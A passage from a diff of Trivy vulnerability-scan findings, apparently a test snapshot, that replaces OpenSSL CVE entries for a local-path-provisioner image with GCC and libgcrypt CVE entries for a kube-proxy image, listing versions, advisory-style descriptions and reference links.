"http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "https://access.redhat.com/security/cve/CVE-2019-15847", + "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "https://linux.oracle.com/cve/CVE-2019-15847.html", + "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "https://www.cve.org/CVERecord?id=CVE-2019-15847", + ], + }, + "category": "Vulnerability", + "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5088-1", + "value": "https://avd.aquasec.com/nvd/cve-2019-15847", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3712", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4963", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210824.txt", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-15847", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-16", + "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-02", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2022-0778", - "installedVersion": "1.1.1g-r0", - "packageName": "libcrypto1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33560", + "installedVersion": "1.8.4-5", + "packageName": "libgcrypt20", "references": [ - "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", - "http://seclists.org/fulldisclosure/2022/May/33", - "http://seclists.org/fulldisclosure/2022/May/35", - "http://seclists.org/fulldisclosure/2022/May/38", - "https://access.redhat.com/errata/RHSA-2022:5326", - "https://access.redhat.com/security/cve/CVE-2022-0778", - "https://bugzilla.redhat.com/2062202", - "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", - "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", - "https://errata.almalinux.org/8/ALSA-2022-5326.html", - "https://errata.rockylinux.org/RLSA-2022:4899", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", - "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", - "https://linux.oracle.com/cve/CVE-2022-0778.html", - "https://linux.oracle.com/errata/ELSA-2022-9272.html", - "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", - "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", - "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220321-0002/", - "https://security.netapp.com/advisory/ntap-20220429-0005/", - "https://support.apple.com/kb/HT213255", - "https://support.apple.com/kb/HT213256", - "https://support.apple.com/kb/HT213257", - "https://ubuntu.com/security/notices/USN-5328-1", - "https://ubuntu.com/security/notices/USN-5328-2", - "https://www.cve.org/CVERecord?id=CVE-2022-0778", - "https://www.debian.org/security/2022/dsa-5103", - "https://www.openssl.org/news/secadv/20220315.txt", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", + "https://access.redhat.com/security/cve/CVE-2021-33560", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", + "https://dev.gnupg.org/T5305", + "https://dev.gnupg.org/T5328", + "https://dev.gnupg.org/T5466", + "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", + "https://eprint.iacr.org/2021/923", + "https://errata.almalinux.org/8/ALSA-2021-4409.html", + "https://linux.oracle.com/cve/CVE-2021-33560.html", + "https://linux.oracle.com/errata/ELSA-2022-9263.html", + "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", + "https://security.gentoo.org/glsa/202210-13", + "https://ubuntu.com/security/notices/USN-5080-1", + "https://ubuntu.com/security/notices/USN-5080-2", + "https://www.cve.org/CVERecord?id=CVE-2021-33560", "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.tenable.com/security/tns-2022-06", - "https://www.tenable.com/security/tns-2022-07", - "https://www.tenable.com/security/tns-2022-08", - "https://www.tenable.com/security/tns-2022-09", + "https://www.oracle.com/security-alerts/cpuoct2021.html", ], }, "category": "Vulnerability", - "description": "The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates", + "name": "libgcrypt: mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0778", + "value": "https://avd.aquasec.com/nvd/cve-2021-33560", }, { "type": "URL", - "value": "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/33", + "value": "https://access.redhat.com/security/cve/CVE-2021-33560", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/35", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/38", + "value": "https://dev.gnupg.org/T5305", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:5326", + "value": "https://dev.gnupg.org/T5328", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0778", + "value": "https://dev.gnupg.org/T5466", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2062202", + "value": "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", + "value": "https://eprint.iacr.org/2021/923", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", + "value": "https://errata.almalinux.org/8/ALSA-2021-4409.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", + "value": "https://linux.oracle.com/cve/CVE-2021-33560.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2022-5326.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-9263.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4899", + "value": "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", + "value": "https://security.gentoo.org/glsa/202210-13", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-0778.html", + "value": "https://ubuntu.com/security/notices/USN-5080-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9272.html", + "value": "https://ubuntu.com/security/notices/USN-5080-2", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33560", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-13627", + "installedVersion": "1.8.4-5", + "packageName": "libgcrypt20", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00060.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00018.html", + "http://www.openwall.com/lists/oss-security/2019/10/02/2", + "https://access.redhat.com/security/cve/CVE-2019-13627", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13627", + "https://dev.gnupg.org/T4683", + "https://github.com/gpg/libgcrypt/releases/tag/libgcrypt-1.8.5", + "https://linux.oracle.com/cve/CVE-2019-13627.html", + "https://linux.oracle.com/errata/ELSA-2020-4482.html", + "https://lists.debian.org/debian-lts-announce/2019/09/msg00024.html", + "https://lists.debian.org/debian-lts-announce/2020/01/msg00001.html", + "https://minerva.crocs.fi.muni.cz/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-13627", + "https://security-tracker.debian.org/tracker/CVE-2019-13627", + "https://security.gentoo.org/glsa/202003-32", + "https://ubuntu.com/security/notices/USN-4236-1", + "https://ubuntu.com/security/notices/USN-4236-2", + "https://ubuntu.com/security/notices/USN-4236-3", + "https://usn.ubuntu.com/4236-1/", + "https://usn.ubuntu.com/4236-2/", + "https://usn.ubuntu.com/4236-3/", + "https://www.cve.org/CVERecord?id=CVE-2019-13627", + ], + }, + "category": "Vulnerability", + "description": "It was discovered that there was a ECDSA timing attack in the libgcrypt20 cryptographic library. Version affected: 1.8.4-5, 1.7.6-2+deb9u3, and 1.6.3-2+deb8u4. Versions fixed: 1.8.5-2 and 1.6.3-2+deb8u7.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "libgcrypt: ECDSA timing attack allowing private key leak", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", + "value": "https://avd.aquasec.com/nvd/cve-2019-13627", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00060.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00018.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "http://www.openwall.com/lists/oss-security/2019/10/02/2", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220321-0002/", + "value": "https://access.redhat.com/security/cve/CVE-2019-13627", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0005/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13627", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213255", + "value": "https://dev.gnupg.org/T4683", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213256", + "value": "https://github.com/gpg/libgcrypt/releases/tag/libgcrypt-1.8.5", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213257", + "value": "https://linux.oracle.com/cve/CVE-2019-13627.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5328-1", + "value": "https://linux.oracle.com/errata/ELSA-2020-4482.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5328-2", + "value": "https://lists.debian.org/debian-lts-announce/2019/09/msg00024.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0778", + "value": "https://lists.debian.org/debian-lts-announce/2020/01/msg00001.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5103", + "value": "https://minerva.crocs.fi.muni.cz/", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220315.txt", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-13627", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-13627", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://security.gentoo.org/glsa/202003-32", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-06", + "value": "https://ubuntu.com/security/notices/USN-4236-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-07", + "value": "https://ubuntu.com/security/notices/USN-4236-2", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-08", + "value": "https://ubuntu.com/security/notices/USN-4236-3", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-09", + "value": "https://usn.ubuntu.com/4236-1/", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4236-2/", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4236-3/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-13627", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.1.1i-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2020-1971", - "installedVersion": "1.1.1g-r0", - "packageName": "libcrypto1.1", + "fixedVersion": "1.8.4-5+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-40528", + "installedVersion": "1.8.4-5", + "packageName": "libgcrypt20", "references": [ - "http://www.openwall.com/lists/oss-security/2021/09/14/2", - "https://access.redhat.com/security/cve/CVE-2020-1971", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2154ab83e14ede338d2ede9bbe5cdfce5d5a6c9e", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f960d81215ebf3f65e03d4d5d857fb9b666d6920", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44676", - "https://linux.oracle.com/cve/CVE-2020-1971.html", - "https://linux.oracle.com/errata/ELSA-2021-9150.html", - "https://lists.apache.org/thread.html/r63c6f2dd363d9b514d0a4bcf624580616a679898cc14c109a49b750c@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rbb769f771711fb274e0a4acb1b5911c8aab544a6ac5e8c12d40c5143@%3Ccommits.pulsar.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2020/12/msg00020.html", - "https://lists.debian.org/debian-lts-announce/2020/12/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DGSI34Y5LQ5RYXN4M2I5ZQT65LFVDOUU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWPSSZNZOBJU2YR6Z4TGHXKYW3YP5QG7/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1971", - "https://security.FreeBSD.org/advisories/FreeBSD-SA-20:33.openssl.asc", - "https://security.gentoo.org/glsa/202012-13", - "https://security.netapp.com/advisory/ntap-20201218-0005/", - "https://security.netapp.com/advisory/ntap-20210513-0002/", - "https://ubuntu.com/security/notices/USN-4662-1", - "https://ubuntu.com/security/notices/USN-4745-1", - "https://www.cve.org/CVERecord?id=CVE-2020-1971", - "https://www.debian.org/security/2020/dsa-4807", - "https://www.openssl.org/news/secadv/20201208.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2021.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2020-11", - "https://www.tenable.com/security/tns-2021-09", - "https://www.tenable.com/security/tns-2021-10", + "https://access.redhat.com/errata/RHSA-2022:5311", + "https://access.redhat.com/security/cve/CVE-2021-40528", + "https://bugzilla.redhat.com/2002816", + "https://bugzilla.redhat.com/show_bug.cgi?id=2002816", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40528", + "https://dev.gnupg.org/rCb118681ebc4c9ea4b9da79b0f9541405a64f4c13", + "https://eprint.iacr.org/2021/923", + "https://errata.almalinux.org/8/ALSA-2022-5311.html", + "https://errata.rockylinux.org/RLSA-2022:5311", + "https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=commit;h=3462280f2e23e16adf3ed5176e0f2413d8861320", + "https://ibm.github.io/system-security-research-updates/2021/07/20/insecurity-elgamal-pt1", + "https://ibm.github.io/system-security-research-updates/2021/09/06/insecurity-elgamal-pt2", + "https://linux.oracle.com/cve/CVE-2021-40528.html", + "https://linux.oracle.com/errata/ELSA-2022-9564.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-40528", + "https://security.gentoo.org/glsa/202210-13", + "https://ubuntu.com/security/notices/USN-5080-1", + "https://ubuntu.com/security/notices/USN-5080-2", + "https://www.cve.org/CVERecord?id=CVE-2021-40528", ], }, "category": "Vulnerability", - "description": "The X.509 GeneralName type is a generic type for representing different types of names. One of those name types is known as EDIPartyName. OpenSSL provides a function GENERAL_NAME_cmp which compares different instances of a GENERAL_NAME to see if they are equal or not. This function behaves incorrectly when both GENERAL_NAMEs contain an EDIPARTYNAME. A NULL pointer dereference and a crash may occur leading to a possible denial of service attack. OpenSSL itself uses the GENERAL_NAME_cmp function for two purposes: 1) Comparing CRL distribution point names between an available CRL and a CRL distribution point embedded in an X509 certificate 2) When verifying that a timestamp response token signer matches the timestamp authority name (exposed via the API functions TS_RESP_verify_response and TS_RESP_verify_token) If an attacker can control both items being compared then that attacker could trigger a crash. For example if the attacker can trick a client or server into checking a malicious certificate against a malicious CRL then this may occur. Note that some applications automatically download CRLs based on a URL embedded in a certificate. This checking happens prior to the signatures on the certificate and CRL being verified. OpenSSL's s_server, s_client and verify tools have support for the "-crl_download" option which implements automatic CRL downloading and this attack has been demonstrated to work against those tools. Note that an unrelated bug means that affected versions of OpenSSL cannot parse or construct correct encodings of EDIPARTYNAME. However it is possible to construct a malformed EDIPARTYNAME that OpenSSL's parser will accept and hence trigger this attack. All OpenSSL 1.1.1 and 1.0.2 versions are affected by this issue. Other OpenSSL releases are out of support and have not been checked. Fixed in OpenSSL 1.1.1i (Affected 1.1.1-1.1.1h). Fixed in OpenSSL 1.0.2x (Affected 1.0.2-1.0.2w).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "The ElGamal implementation in Libgcrypt before 1.9.4 allows plaintext recovery because, during interaction between two cryptographic libraries, a certain dangerous combination of the prime defined by the receiver's public key, the generator defined by the receiver's public key, and the sender's ephemeral exponents can lead to a cross-configuration attack against OpenPGP.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: EDIPARTYNAME NULL pointer de-reference", + "name": "ElGamal implementation allows plaintext recovery", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1971", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/14/2", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1971", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2154ab83e14ede338d2ede9bbe5cdfce5d5a6c9e", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f960d81215ebf3f65e03d4d5d857fb9b666d6920", + "value": "https://avd.aquasec.com/nvd/cve-2021-40528", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44676", + "value": "https://access.redhat.com/errata/RHSA-2022:5311", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1971.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-40528", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9150.html", + "value": "https://bugzilla.redhat.com/2002816", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r63c6f2dd363d9b514d0a4bcf624580616a679898cc14c109a49b750c@%3Cdev.tomcat.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2002816", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rbb769f771711fb274e0a4acb1b5911c8aab544a6ac5e8c12d40c5143@%3Ccommits.pulsar.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40528", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2020/12/msg00020.html", + "value": "https://dev.gnupg.org/rCb118681ebc4c9ea4b9da79b0f9541405a64f4c13", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2020/12/msg00021.html", + "value": "https://eprint.iacr.org/2021/923", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DGSI34Y5LQ5RYXN4M2I5ZQT65LFVDOUU/", + "value": "https://errata.almalinux.org/8/ALSA-2022-5311.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWPSSZNZOBJU2YR6Z4TGHXKYW3YP5QG7/", + "value": "https://errata.rockylinux.org/RLSA-2022:5311", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1971", + "value": "https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=commit;h=3462280f2e23e16adf3ed5176e0f2413d8861320", }, { "type": "URL", - "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-20:33.openssl.asc", + "value": "https://ibm.github.io/system-security-research-updates/2021/07/20/insecurity-elgamal-pt1", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202012-13", + "value": "https://ibm.github.io/system-security-research-updates/2021/09/06/insecurity-elgamal-pt2", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20201218-0005/", + "value": "https://linux.oracle.com/cve/CVE-2021-40528.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", + "value": "https://linux.oracle.com/errata/ELSA-2022-9564.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4662-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-40528", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4745-1", + "value": "https://security.gentoo.org/glsa/202210-13", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1971", + "value": "https://ubuntu.com/security/notices/USN-5080-1", }, { "type": "URL", - "value": "https://www.debian.org/security/2020/dsa-4807", + "value": "https://ubuntu.com/security/notices/USN-5080-2", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20201208.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-40528", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-6829", + "installedVersion": "1.8.4-5", + "packageName": "libgcrypt20", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-6829", + "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", + "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", + "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", + "https://www.cve.org/CVERecord?id=CVE-2018-6829", + "https://www.oracle.com/security-alerts/cpujan2020.html", + ], + }, + "category": "Vulnerability", + "description": "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly, improperly encodes plaintexts, which allows attackers to obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for Libgcrypt's ElGamal implementation.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": 